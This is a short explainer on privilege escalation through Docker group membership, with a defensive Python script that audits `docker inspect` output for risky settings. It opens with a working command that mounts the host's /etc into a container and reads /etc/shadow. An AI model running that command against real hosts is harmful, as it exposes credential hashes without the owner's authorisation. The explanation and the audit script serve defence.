To see the issue, run this as a normal user who has permission to run docker commands (i.e. is a member of the docker group):
docker run -it --rm -v/etc:/mnt/etc alpine:latest sh -c "apk add --no-cache bash && exec bash"
$ cat /mnt/etc/shadow
There are many ways of escalating privileges in Docker, not just because containers run as root by default, but also because of the ability to set Linux capabilities (like SYS_ADMIN, NET_ADMIN, SYS_MODULE, etc.), access to host namespaces and devices, and more.
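For the defensive side, the following added example (not code from the original page) audits `docker inspect` output for the settings listed above: root user, added capabilities, host namespaces, host devices and bind mounts of sensitive host paths. The function names, the `SENSITIVE_PATHS` list and the sample records are assumptions constructed for illustration.

```python
import json

RISKY_CAPS = {"ALL", "SYS_ADMIN", "NET_ADMIN", "SYS_MODULE"}  # named on the page, plus ALL
SENSITIVE_PATHS = ("/etc", "/root", "/var/run/docker.sock")   # assumed list, extend as needed

# Constructed sample shaped like `docker inspect` output; not captured from a real host.
SAMPLE_INSPECT = json.dumps([
    {"Name": "/shell", "Config": {"User": ""},
     "HostConfig": {"Privileged": False, "CapAdd": None, "PidMode": "", "Devices": []},
     "Mounts": [{"Type": "bind", "Source": "/etc", "Destination": "/mnt/etc", "RW": True}]},
    {"Name": "/netdebug", "Config": {"User": "1000:1000"},
     "HostConfig": {"Privileged": False, "CapAdd": ["CAP_NET_ADMIN"], "PidMode": "host",
                    "Devices": [{"PathOnHost": "/dev/sda"}]}, "Mounts": []},
    {"Name": "/web", "Config": {"User": "1000"},
     "HostConfig": {"Privileged": False, "CapAdd": [], "PidMode": "", "Devices": []},
     "Mounts": [{"Type": "volume", "Source": "/var/lib/docker/volumes/web/_data", "RW": True}]},
])

def is_sensitive(src):
    """True when a bind source is the host root or sits at/under a sensitive path."""
    src = src.rstrip("/") or "/"
    return src == "/" or any(src == p or src.startswith(p + "/") for p in SENSITIVE_PATHS)

def audit(inspect_json):
    """Map container name -> list of risky settings found in its inspect record."""
    findings = {}
    for c in json.loads(inspect_json):
        host, issues = c.get("HostConfig") or {}, []
        # An empty Config.User means the container process runs as root.
        user = ((c.get("Config") or {}).get("User") or "").split(":")[0]
        if user in ("", "0", "root"):
            issues.append("runs as root")
        if host.get("Privileged"):
            issues.append("privileged")
        for cap in host.get("CapAdd") or []:
            name = cap.upper()
            name = name[4:] if name.startswith("CAP_") else name
            if name in RISKY_CAPS:
                issues.append("cap " + name)
        for key in ("PidMode", "NetworkMode", "IpcMode", "UTSMode"):
            if host.get(key) == "host":
                issues.append(key + "=host")
        for dev in host.get("Devices") or []:
            issues.append("device " + str(dev.get("PathOnHost")))
        for m in c.get("Mounts") or []:
            if m.get("Type") == "bind" and is_sensitive(m.get("Source", "")):
                issues.append("bind " + m["Source"] + (" (rw)" if m.get("RW") else " (ro)"))
        if issues:
            findings[c.get("Name", "?").lstrip("/")] = issues
    return findings
```

On a real host, pass `audit()` the output of `docker inspect $(docker ps -q)` instead of the sample.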